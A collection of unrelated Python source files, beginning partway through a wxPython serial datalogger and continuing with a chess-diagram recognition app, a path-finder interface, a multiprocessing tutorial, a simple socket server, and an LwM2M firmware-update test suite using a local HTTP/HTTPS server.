self.ser_msg=wx.StaticText(panel, label="Close", size=wx.Size(150,18))
self.ser_msg.SetBackgroundColour('#F1F7EE')
self.ser_msg.SetForegroundColour('#364958')
self.ser_msg.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(self.ser_msg,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
text_2 = wx.StaticText(panel, label="Recording Data: ")
text_2.SetBackgroundColour('#F1F7EE')
text_2.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(text_2,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
self.text_msg=wx.StaticText(panel, label=" Stop", size=wx.Size(150,18))
self.text_msg.SetBackgroundColour('#F1F7EE')
self.text_msg.SetForegroundColour('#3B6064')
self.text_msg.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(self.text_msg,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
sizer.Add(self.box_msg, pos=(4,0), span=(1, 8),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.BOTTOM , border=10)
sizer.AddGrowableCol(2)
panel.SetSizer(sizer)
sizer.Fit(self)
self.Center()
self.Show(True)
#------------------------------------------------------------------------------------------------
def onRec(self,event):
# ------------ Function for export data
# print('rec')
# print(self.rec_button.Label)
if self.rec_button.Label=='REC':
print('rec')
# self.path_dir= os.path.abspath(os.getc wd())
self.data_rec = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
self.text_msg.SetLabel('Exporting file ...'+ self.data_rec+'.csv')
# f=self.path_dir+"\\"+self.data_rec+'.csv'
f='csv/'+self.data_rec+'.csv'
print(self.path_dir)
# Create CSV file
with open(f, 'w') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add header to the csv file
csv_writer.writerow(['Date Time','Baudrate','Data analog1','Data analog2'])
global flag_save
flag_save = True
self.rec_button.SetLabel('STOP')
else:
self.text_msg.SetLabel('Stop')
self.rec_button.SetLabel('REC')
flag_save = False
# List COM availables
def List_port(self,event):
# print(serial_ports)
ports = list(serial.tools.list_ports.comports())
lst = []
for p in ports:
print (type(p.device))
lst.append(p.device)
self.choices=lst
self.port.SetItems(self.choices)
print(ports)
# Get de Baudrate selected
def selec_baud(self,event):
self.baud_selec=self.baud.GetStringSelection()
print(self.baud_selec)
# Get Port Selected or writer
def selec_port(self,event):
self.port_selec =self.port.GetStringSelection()
print(self.port.GetStringSelection())
def write_port(self,event):
self.port_selec = self.port.GetValue()
# Open System Directory to choose a folder
def onDir(self, event):
"""
Show the DirDialog and print the user's choice
"""
dlg = wx.DirDialog(self, "Choose a directory:",
style=wx.DD_DEFAULT_STYLE
#| wx.DD_DIR_MUST_EXIST
#| wx.DD_CHANGE_DIR
)
if dlg.ShowModal() == wx.ID_OK:
print ("You chose %s" % dlg.GetPath())
self.path.SetValue(dlg.GetPath())
self.path_dir = dlg.GetPath()
dlg.Destroy()
# Start thread of Serial Communication
def onConnect(self, event):
global stop_threads
global stop_threads_1
# global ser
print('port: '+ self.port_selec +'Baud: '+self.baud_selec)
if self.connect_button.Label=='Connect':
if(self.port_selec == '' or self.port_selec == 'Choose a port'):
wx.MessageBox(message=" Choose a Port", caption= "Warning")
else:
self.connect_button.SetLabel('Disconnect')
stop_threads = False
stop_threads_1 = False
print('Start')
self.Serial=Serial_com(self.port_selec,self.baud_selec)
# wx.MessageBox(message=" Connection Started", caption= "Connect")
self.ser_msg.SetLabel("Open")
self.port.Disable()
self.baud.Disable()
else:
self.connect_button.SetLabel('Connect')
stop_threads = True
# stop_threads_1 = True
# wx.MessageBox(message=" Connection Ended", caption= "Disconnect")
self.ser_msg.SetLabel("Close")
# self.Serial.endApplication()
self.port.Enable()
self.baud.Enable()
# Reset Plot Limits
def Set_Limit(self,event):
self.y_max= int(self.Limit_max.GetValue())
self.y_min= int(self.Limit_min.GetValue())
self._plot.y_max = self.y_max
self._plot.y_min = self.y_min
# print(self.y_max)
# print(self.y_min)
# Stop all threads
def OnClose(self, event):
self.Serial.t1._stop()
self.Serial.t2._stop()
self._plot.t3._stop()
global stop_threads, stop_threads_1
# self.animator.event_source.stop()
stop_threads =True
stop_threads_1 = True
self.Destroy()
# Class for save data received and create arrays for plotting
class DataPlot:
def __init__(self, max_entries = 60):
self.axis_t = deque([0],maxlen=max_entries)
self.axis_data1 = deque([0],maxlen=max_entries)
self.axis_data2 = deque([0],maxlen=max_entries)
self.tim = 0
self.data = [0, 0]
self.data_save=[]
self.max_entries = max_entries
self.count=0
# function for save data for plotting, save data in CSV and update current value
def save_all(self,data1,data2):
self.tim=datetime.now().strftime('%Y %m %d %H:%M:%S')
######## DATA1 ##########################
self.axis_t.append(datetime.now().strftime('%H:%M:%S'))
# print(self.axis_t)
self.axis_data1.append(data1)
# print(self.axis_data1)
######## DATA2 ##############
self.axis_data2.append(data2)
# print(self.axis_data2)
# frame.plot_data(data.axis_data1,data.axis_t)
# Wait for get two data form serial before save
def save (self,a,i):
self.count=self.count+1
self.data[i]=a
if(self.count==2):
# print(self.data)
self.save_all(self.data[0],self.data[1])
self.count=0
global event
event.set()
class RealtimePlot:
def __init__(self, a,canvas, fig):
self.y_min = 0
self.y_max = 100
# -------------------- PLOT SETTINGS -----------------------------------------------------
self.a = a
self.canvas = canvas
self.fig = fig
self.lineplot, = self.a.plot([],[],'ro-', label="Data1",markersize=1, linewidth=1)
self.lineplot1, = self.a.plot( [],[],'bo-', label="Data2",markersize=1,linewidth=1)
self.a.legend(loc=1)
self.a.minorticks_on()
self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
self.fig.canvas.draw()
self.t3= Thread(target = self.loop)
self.t3.start()
# Plotting Real timeF
def loop (self):
while True:
global stop_threads_1, event
if stop_threads_1:
break
# print(data.axis_data1)
# print(data.axis_data2)
self.anim()
time.sleep(0.5)
def anim (self):
# self.a.clear()
self.a.set_xticklabels(data.axis_t, fontsize=8)
self.a.set_ylim([self.y_min , self.y_max ])
# print(self.y_min,self.y_max)
y=np.arange(self.y_min, self.y_max+5,10)
self.a.set_yticks(y)
# self.a.set_yticklabels(y, fontsize=8)
self.a.autoscale_view(True)
self.a.relim()
# self.a.plot(list(range(len(data.axis_data1))),data.axis_data1,'ro-', label="Data1",markersize=1, linewidth=1)
# self.a.plot(list(range(len(data.axis_data2))),data.axis_data2,'bo-', label="Data2",markersize=1,linewidth=1) # self.a.plot(list(range(len(data.axis_data1))),data.axis_data1,'ro-', label="Data1",markersize=1, linewidth=1)
self.lineplot.set_data(np.arange(0,len(data.axis_data1),1),np.array(data.axis_data1))
self.lineplot1.set_data(np.arange(0,len(data.axis_data2),1),np.array(data.axis_data2))
# self.a.legend(loc=1)
# self.a.minorticks_on()
# self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
# self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
self.fig.canvas.draw()
# self.fig.canvas.draw_idle()
if __name__ == '__main__':
# object for save data
data = DataPlot()
# GUI panel
app = wx.App(False)
frame = Screen(None, 'Datalogger')
# Main loop for GUI
app.MainLoop()
|
Application.py
|
################################################################################
# Main application
################################################################################
import queue
import threading
from os.path import abspath, dirname, join
import tkinter as tk
from PIL import Image, ImageTk, ImageOps, UnidentifiedImageError
import cv2 as cv
import numpy as np
import tensorflow as tf
from tensorflow import keras
import sys
sys.path.insert(0, join(abspath(dirname(__file__)), "../tools"))
from detection import get_diagram_position
from relative_to_absolute_path import get_absolute_path
from diagrams_to_squares import get_squares
################################################################################
################################################################################
def load_pieces() -> dict:
return {
4: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bB.png", __file__)).resize((70, 70))
),
6: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bK.png", __file__)).resize((70, 70))
),
3: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bN.png", __file__)).resize((70, 70))
),
1: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bP.png", __file__)).resize((70, 70))
),
5: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bQ.png", __file__)).resize((70, 70))
),
2: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bR.png", __file__)).resize((70, 70))
),
10: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wB.png", __file__)).resize((70, 70))
),
12: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wK.png", __file__)).resize((70, 70))
),
9: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wN.png", __file__)).resize((70, 70))
),
7: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wP.png", __file__)).resize((70, 70))
),
11: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wQ.png", __file__)).resize((70, 70))
),
8: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wR.png", __file__)).resize((70, 70))
),
}
################################################################################
################################################################################
class ProcessImage:
def __init__(self, a_queue):
self.a_queue = a_queue
self.black_model = keras.models.load_model(
get_absolute_path("../resources/black_model.h5", __file__)
)
self.white_model = keras.models.load_model(
get_absolute_path("../resources/white_model.h5", __file__)
)
def process(self, np_image):
np_diagram = get_diagram_position(np_image)
# is a diagram large enough
if np_diagram.shape[0] * 5 < np_image.shape[0] or np_diagram.shape[1] * 5 < np_image.shape[1]:
print("No diagram")
return None
result = []
black_squares, white_squares = get_squares(np_diagram)
for image, i, j in black_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.black_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
for image, i, j in white_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.white_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
self.a_queue.put_nowait(result)
################################################################################
################################################################################
class ChessBoard(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.canvas = tk.Canvas(self, width=560, height=560)
self.canvas.place(x=20, y=20)
self.board_image = ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/board.jpg", __file__)).resize((560, 560))
)
self.canvas.create_image(0, 0, image=self.board_image, anchor=tk.NW)
self.pieces = load_pieces()
self.showed_pieces = []
def clear_board(self):
for piece_ref in self.showed_pieces:
self.canvas.delete(piece_ref)
self.showed_pieces = []
def set_piece(self, i, j, piece_id):
piece_ref = self.canvas.create_image(i * 70, j * 70, image=self.pieces[piece_id], anchor=tk.NW)
self.showed_pieces.append(piece_ref)
################################################################################
################################################################################
class LeftSide(tk.Frame):
def __init__(self, root, chess_board, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.camera_button = tk.Button(self, text="Open camera", command=self.show_frame)
self.camera_button.place(x=50, y=20)
self.browse_button = tk.Button(self, text="Browse file", command=self.show_image)
self.browse_button.place(x=200, y=20)
self.image_on_canvas = None
self.canvas = tk.Canvas(self, width=450, height=450)
self.canvas.place(x=50, y=100)
self.cv_video_capture = None
self.video_camera_on = False
self.chess_board = chess_board
self.a_queue = queue.Queue()
self.process_image = ProcessImage(self.a_queue)
self.thread = None
def show_frame(self):
self.video_camera_on = True
self.show_video_frame()
def show_video_frame(self, counter=1):
if not self.video_camera_on:
return
if not self.cv_video_capture:
self.cv_video_capture = cv.VideoCapture(0)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_WIDTH, 450)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_HEIGHT, 450)
_, frame = self.cv_video_capture.read()
# frame = cv.flip(frame, 1)
cv2image = cv.cvtColor(frame, cv.COLOR_BGR2RGBA)
if counter == 1:
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
elif not self.a_queue.empty():
self.show_pieces(self.a_queue.get(0))
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
image = Image.fromarray(cv2image)
image_tk = ImageTk.PhotoImage(image=image)
self.canvas.delete(tk.ALL)
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
if self.cv_video_capture:
self.canvas.after(20, self.show_video_frame, counter + 1)
def show_image(self):
self.video_camera_on = False
if self.cv_video_capture:
self.cv_video_capture = self.cv_video_capture.release()
self.canvas.delete(tk.ALL)
from tkinter import filedialog
file_path = filedialog.askopenfilename(title="Select file")
if file_path:
try:
image = Image.open(file_path)
self.process_image.process(np.array(image)[..., :3])
self.show_pieces(self.a_queue.get(0))
image_tk = ImageTk.PhotoImage(image.resize((450, 450)))
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
except UnidentifiedImageError:
pass
def show_pieces(self, pieces):
self.chess_board.clear_board()
for i, j, piece_id in pieces:
self.chess_board.set_piece(i, j, piece_id)
################################################################################
################################################################################
class Application(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.root = root
self.root.title("Chess Diagram Recognition")
self.chess_board = ChessBoard(self.root, height=600, width=600)
self.chess_board.place(x=600, y=0)
self.left_side = LeftSide(
self.root,
self.chess_board,
height=600,
width=600
)
self.left_side.place(x=0, y=0)
################################################################################
################################################################################
def main():
root = tk.Tk()
root.bind("<Escape>", lambda e: root.quit())
Application(root)
root.minsize(height=600, width=1200)
root.maxsize(height=600, width=1200)
root.mainloop()
################################################################################
################################################################################
main()
|
localPathFinderInterface.py
|
import errno
import os
from threading import Thread
import time
from engine.interface import fileUtils
from engine.pathFinder import PathFinder
from engine.pathFinderManager import PathFinderManager
import gui
from gui.pathFinder.pathFinderInterface import PathFinderInterface
MAX_FILE_DUMPS = 1000
class LocalPathFinderInterface(PathFinderInterface):
"""
Manages a local path finder for use in PathFindViewer.
"""
def __init__(self, dumpScenarios=False):
PathFinderInterface.__init__(self)
self._pathFinderManager = PathFinderManager()
self._pathFinderManager.setListeners(self._fireInputAccepted, self._fireStepPerformed)
self._solving = False
self._solveID = 0
self._dumpScenarios = dumpScenarios
def submitProblem(self, params, scenario, vehicle):
if self._solving:
print "Cannot submit problem while other operations are in progress!"
return
self._pathFinderManager.submitProblem(params, scenario, vehicle)
def stepProblem(self, numSteps=1):
if self._solving:
print "Cannot step problem while other operations are in progress!"
return
self._pathFinderManager.stepProblem(numSteps)
def solveProblem(self, params, scenario, vehicle, timeout):
startTime = time.time()
if self._pathFinderManager.getStepsRemaining() > 0 or self._solving:
print "Cannot start a solve operation while other operations are in progress!"
return
self._solving = True
if self._dumpScenarios:
self._solveID += 1
solveID = self._solveID % MAX_FILE_DUMPS
dumpDirectory = os.path.join(os.path.expanduser("~"), "pathDumps")
if not os.path.exists(dumpDirectory):
try:
os.makedirs(dumpDirectory)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
path = os.path.join(dumpDirectory, "dump" + str(solveID) + ".json")
print "Solving problem ID = " + str(solveID) + ". Problem stored in: " + path
fileUtils.save(path, params, scenario, vehicle)
Thread(target=self._solve, args=[params, scenario, vehicle, startTime, timeout]).start()
def _solve(self, params, scenario, vehicle, startTime, timeout):
self._fireInputAccepted(params, scenario, vehicle)
pathFinder = PathFinder(params, scenario, vehicle)
totalTime = 0.0
numSteps = 0
# Timeout occurs when total_time + avg_time_per_step > timeout
while pathFinder.step():
totalTime = time.time() - startTime
numSteps += 1
if (totalTime * (numSteps + 1)) / numSteps > timeout:
break
bestPath = pathFinder.getBestPath()
pathFinder.destroy()
self._solving = False
self._fireSolved(bestPath)
|
MutiProcessProgramming.py
|
print('MultiProcessProgramming')
# Unix 多进程创建 fork
#
# import os
#
# print('Process (%s) start...' % os.getpid())
#
# pid = os.fork()
#
# if pid == 0:
# print('I am child process(%s) and parent is %s' % (os.getpid(),os.getppid()))
# else:
# print('I (%s) just created a child process (%s)' % (os.getpid(), pid))
#
# # multiprocessing windows 可用 跨平台的方法
#
# from multiprocessing import Process
# import os
#
# # 子进程要执行的代码
#
# def run_proc(name):
# print('Run child process %s (%s)...' % (name, os.getpid()))
#
# if __name__ == '__main__':
# print('Parent process %s.' % os.getpid())
# p = Process(target=run_proc, args=('test',))
# p.start();
# p.join();
# print('Child process end.')
# Pool 启动大量子进程 进程池
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s) ...' % (name, os.getpid()))
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print('task %s runs %.02f seconds .' % (name, (end - start)))
if __name__ == '__main__':
print('Parent progress %s.' % os.getpid())
p = Pool(4)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print('Waiting for all sub process done...')
p.close()
p.join()
print('All sub process done.')
# 子进程
# 进程间 通信
# 多线程
|
FS1Server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# (wg-python-fix-pdbrc)
### HEREHEREHERE
from __future__ import annotations
import os
import optparse
import sys
import re
import socket
import threading
#############################################################################
# git FlexSpec1/Code/FlexSpec/ClientServer/FS1Server.py
#
#
#emacs helpers
# (insert (format "\n# %s " (buffer-file-name)))
#
#
# (set-input-method 'TeX' t)
# (toggle-input-method)
#
# (wg-astroconda3-pdb) # CONDA Python3
#
# (wg-python-fix-pdbrc) # PDB DASH DEBUG end-comments
#
# (ediff-current-file)
# (find-file-other-frame "./.pdbrc")
# (setq mypdbcmd (concat (buffer-file-name) "<args...>"))
# (progn (wg-python-fix-pdbrc) (pdb mypdbcmd))
#
# (wg-astroconda-pdb) # IRAF27
#
# (set-background-color "light blue")
#
# (wg-python-toc)
#
#############################################################################
__doc__ = """
clientserver/FS1Server.py
[options] files...
The FS1Server is a class that listens on a port on 'this' machine
(its a server); for messages of fixed length utf-8 characers.
If it sees the message starting with disconnect_msg it will stop
the loop and hangup.
https://stackoverflow.com/questions/6380057/python-binding-socket-address-already-in-use
"""
__author__ = 'Wayne Green'
__version__ = '0.1'
# from FS1Server import FS1Server, FS1ServerException
__all__ = ['FS1Server','FS1ServerException']
##############################################################################
# FS1ServerException
#
##############################################################################
class FS1ServerException(Exception):
"""Special exception to allow differentiated capture of exceptions"""
def __init__(self,message,errors=None):
super(FS1ServerException,self).__init__("FS1Server "+ message)
self.errors = errors
@staticmethod
def __format__(e):
return f" FS1Server: {e.__str__()}\n"
# FS1ServerException
##############################################################################
# FS1Server
#
##############################################################################
class FS1Server(object):
""" Make a server side for FS1Server.
"""
#__slots__ = [''] # add legal instance variables
# (setq properties `("" ""))
DEFAULT_MESSAGESIZE = 256 # a message is always 64 bytes, this example
DEFAULT_SERVER = socket.gethostbyname(socket.gethostname())
DEFAULT_PORT = 45654 # my cute port address
ADDR = (DEFAULT_SERVER, DEFAULT_PORT) # use a tuple
FORMAT = 'utf-8' # basic ASCII like strings
DEFAULT_DISCONNECT = "!DISCONNECT!" # signal server to close
def __init__(self, port : int = None, # FS1Server::__init__()
msgsize : int = None,
disconnect_msg : str = None,
serverip : str = None, # '127.0.0.1',
ostream : _io.TextIOWrapper = sys.stdout
):
"""Defaults to localhost, and to port 45654"""
self.PORT = port or FS1Server.DEFAULT_PORT
self.SERVER = serverip or FS1Server.DEFAULT_SERVER
self.MESSAGESIZE = msgsize or FS1Server.DEFAULT_MESSAGESIZE
self.DISCONNECT_MESSAGE = disconnect_msg or FS1Server.DEFAULT_DISCONNECT
self.FORMAT = 'utf-8' # force this
self._ADDR = (self.SERVER, self.PORT) # use a tuple
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind(self._ADDR) # bind these two using the tuple
self.ostream = ostream # place for print to dump things.
### FS1Server.__init__()
def debug(self, msg="", skip=[], os=sys.stderr): # FS1Server::debug()
"""Help with momentary debugging, file to fit.
msg -- special tag for this call
skip -- the member variables to ignore
os -- output stream: may be IOStream etc.
"""
import pprint
print("FS1Server - %s " % msg, file=os)
for key,value in self.__dict__.items():
if(key in skip):
continue
print(f'{key:20s} =', file=os, end='')
pprint.pprint(value,stream=os,indent=4)
return self
### FS1Server.debug()
__FS1Server_debug = debug # really preserve our debug name if we're inherited
@staticmethod
def handle_client(conn, addr):
"""Method is on a separate thread. Handle the single connection with a
thread (below) Messages are two exchanges, one is the pad
"length", the last is the padded message
client -> "ing(len)" + b' ' * FS1Server.MESSAGESIZE - (sizeof msg)
result = client -> 'payload' + b' ' * FS1Server.MESSAGESIZE - (sizeof payload)
"""
print(f"[NEW CONNECTION] {addr} connected.",file=self.ostream)
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length: # the first message has a None so skip that one
msg_length = int(msg_length) # blocks
msg = conn.recv(msg_length).decode(FORMAT) # blocks
if msg == FS1Server.DISCONNECT_MESSAGE:
connected = False
if(1): print(f"[{addr}] {msg}")
conn.send("Msg received".encode(FORMAT)) # reply something to client.
conn.close() # close the current connection, exit this thread,
# handle_client
def start(self):
"""Allow the socket to start listening for connections.
This winds up being a thread."""
self.server.listen()
if(1): print(f"[LISTENING] Server is listening on {self.SERVER}",file=sys.stderr)
while True:
conn, addr = self.server.accept() # server.accept 'blocks' until the connection
print("conn ",conn)
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
if(1): print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}",file=sys.stderr)
# start
def write(self,msg):
"""Pass along msg to subclass"""
pass
def read(self,character):
"""Get a message from sub-class. Follow some protocol."""
raise FS1ServerException("FS1Server::read Unimplemented.")
#pass
# class FS1Server
##############################################################################
# Main
# Regression Tests
##############################################################################
# HEREHEREHERE
if __name__ == "__main__":
opts = optparse.OptionParser(usage="%prog "+__doc__)
opts.add_option("-v", "--verbose", action="store_true", dest="verboseflag",
default=False,
help="<bool> be verbose about work.")
(options, args) = opts.parse_args()
print("hello") # PDB-DEBUG
testserver = FS1Server()
print("[STARTING] server is starting...")
testserver.debug()
testserver.start()
|
firmware_update.py
|
# Copyright 2020 AVSystem <avsystem@avsystem.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http
import os
import ssl
import threading
import time
import jni_test
from framework.lwm2m.messages import *
from framework.test_utils import *
UPDATE_STATE_IDLE = 0
UPDATE_STATE_DOWNLOADING = 1
UPDATE_STATE_DOWNLOADED = 2
UPDATE_STATE_UPDATING = 3
UPDATE_RESULT_INITIAL = 0
UPDATE_RESULT_SUCCESS = 1
UPDATE_RESULT_NOT_ENOUGH_SPACE = 2
UPDATE_RESULT_OUT_OF_MEMORY = 3
UPDATE_RESULT_CONNECTION_LOST = 4
UPDATE_RESULT_INTEGRITY_FAILURE = 5
UPDATE_RESULT_UNSUPPORTED_PACKAGE_TYPE = 6
UPDATE_RESULT_INVALID_URI = 7
UPDATE_RESULT_FAILED = 8
UPDATE_RESULT_UNSUPPORTED_PROTOCOL = 9
FIRMWARE_PATH = '/firmware'
class FirmwareUpdate:
class Test(jni_test.LocalSingleServerTest):
def set_expect_send_after_state_machine_reset(self, expect_send_after_state_machine_reset):
self.expect_send_after_state_machine_reset = expect_send_after_state_machine_reset
def setUp(self, garbage=0, *args, **kwargs):
garbage_lines = ''
while garbage > 0:
garbage_line = '#' * (min(garbage, 80) - 1) + '\n'
garbage_lines += garbage_line
garbage -= len(garbage_line)
self.FIRMWARE_SCRIPT_CONTENT = garbage_lines.encode('ascii')
super().setUp(*args, **kwargs)
def tearDown(self):
try:
super().tearDown()
finally:
try:
os.unlink('downloaded_firmware')
except FileNotFoundError:
pass
def read_update_result(self):
req = Lwm2mRead(ResPath.FirmwareUpdate.UpdateResult)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(), res)
return int(res.content)
def read_state(self):
req = Lwm2mRead(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(), res)
return int(res.content)
def write_firmware_and_wait_for_download(self, firmware_uri: str,
download_timeout_s=20):
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI, firmware_uri)
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
# wait until client downloads the firmware
deadline = time.time() + download_timeout_s
while time.time() < deadline:
time.sleep(0.5)
if self.read_state() == UPDATE_STATE_DOWNLOADED:
return
self.fail('firmware still not downloaded')
class TestWithHttpServer(Test):
RESPONSE_DELAY = 0
CHUNK_SIZE = sys.maxsize
ETAGS = False
def get_firmware_uri(self):
return 'http://127.0.0.1:%d%s' % (self.http_server.server_address[1], FIRMWARE_PATH)
def provide_response(self, use_real_app=False):
with self._response_cv:
self.assertIsNone(self._response_content)
if use_real_app:
with open(os.path.join(self.config.demo_path, self.config.demo_cmd), 'rb') as f:
firmware = f.read()
self._response_content = make_firmware_package(
firmware)
else:
self._response_content = make_firmware_package(
self.FIRMWARE_SCRIPT_CONTENT)
self._response_cv.notify()
def _create_server(self):
test_case = self
class FirmwareRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(http.HTTPStatus.OK)
self.send_header('Content-type', 'text/plain')
if test_case.ETAGS:
self.send_header('ETag', '"some_etag"')
self.end_headers()
# This condition variable makes it possible to defer sending the response.
# FirmwareUpdateStateChangeTest uses it to ensure demo has enough time
# to send the interim "Downloading" state notification.
with test_case._response_cv:
while test_case._response_content is None:
test_case._response_cv.wait()
response_content = test_case._response_content
test_case.requests.append(self.path)
test_case._response_content = None
def chunks(data):
for i in range(0, len(response_content), test_case.CHUNK_SIZE):
yield response_content[i:i + test_case.CHUNK_SIZE]
for chunk in chunks(response_content):
time.sleep(test_case.RESPONSE_DELAY)
self.wfile.write(chunk)
self.wfile.flush()
def log_request(self, code='-', size='-'):
# don't display logs on successful request
pass
return http.server.HTTPServer(('', 0), FirmwareRequestHandler)
def write_firmware_and_wait_for_download(self, *args, **kwargs):
requests = list(self.requests)
super().write_firmware_and_wait_for_download(*args, **kwargs)
self.assertEqual(requests + ['/firmware'], self.requests)
def setUp(self, *args, **kwargs):
self.requests = []
self._response_content = None
self._response_cv = threading.Condition()
self.http_server = self._create_server()
super().setUp(*args, **kwargs)
self.server_thread = threading.Thread(
target=lambda: self.http_server.serve_forever())
self.server_thread.start()
def tearDown(self):
try:
super().tearDown()
finally:
self.http_server.shutdown()
self.server_thread.join()
class TestWithTlsServer(Test):
@staticmethod
def _generate_pem_cert_and_key(cn='127.0.0.1', alt_ip='127.0.0.1'):
import datetime
import ipaddress
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
key = rsa.generate_private_key(public_exponent=65537, key_size=2048,
backend=default_backend())
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])
now = datetime.datetime.utcnow()
cert_builder = (x509.CertificateBuilder().
subject_name(name).
issuer_name(name).
public_key(key.public_key()).
serial_number(1000).
not_valid_before(now).
not_valid_after(now + datetime.timedelta(days=1)))
if alt_ip is not None:
cert_builder = cert_builder.add_extension(x509.SubjectAlternativeName(
[x509.DNSName(cn), x509.IPAddress(ipaddress.IPv4Address(alt_ip))]),
critical=False)
cert = cert_builder.sign(key, hashes.SHA256(), default_backend())
cert_pem = cert.public_bytes(encoding=serialization.Encoding.PEM)
key_pem = key.private_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
return cert_pem, key_pem
def setUp(self, pass_cert_to_demo=True):
cert_pem, key_pem = self._generate_pem_cert_and_key()
with tempfile.NamedTemporaryFile(delete=False) as cert_file, \
tempfile.NamedTemporaryFile(delete=False) as key_file:
cert_file.write(cert_pem)
cert_file.flush()
key_file.write(key_pem)
key_file.flush()
self._cert_file = cert_file.name
self._key_file = key_file.name
extra_cmdline_args = []
if pass_cert_to_demo:
extra_cmdline_args += ['--fw-cert-file', self._cert_file]
super().setUp(extra_cmdline_args=extra_cmdline_args)
def tearDown(self):
def unlink_without_err(fname):
try:
os.unlink(fname)
except:
print('unlink(%r) failed' % (fname,))
sys.excepthook(*sys.exc_info())
try:
super().tearDown()
finally:
unlink_without_err(self._cert_file)
unlink_without_err(self._key_file)
class TestWithHttpsServer(TestWithTlsServer, TestWithHttpServer):
def get_firmware_uri(self):
http_uri = super().get_firmware_uri()
assert http_uri[:5] == 'http:'
return 'https:' + http_uri[5:]
def _create_server(self):
http_server = super()._create_server()
http_server.socket = ssl.wrap_socket(http_server.socket, certfile=self._cert_file,
keyfile=self._key_file,
server_side=True)
return http_server
class FirmwareUpdateHttpsTest(FirmwareUpdate.TestWithHttpsServer):
def runTest(self):
self.provide_response()
self.write_firmware_and_wait_for_download(
self.get_firmware_uri(), download_timeout_s=20)
# Execute /5/0/2 (Update)
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
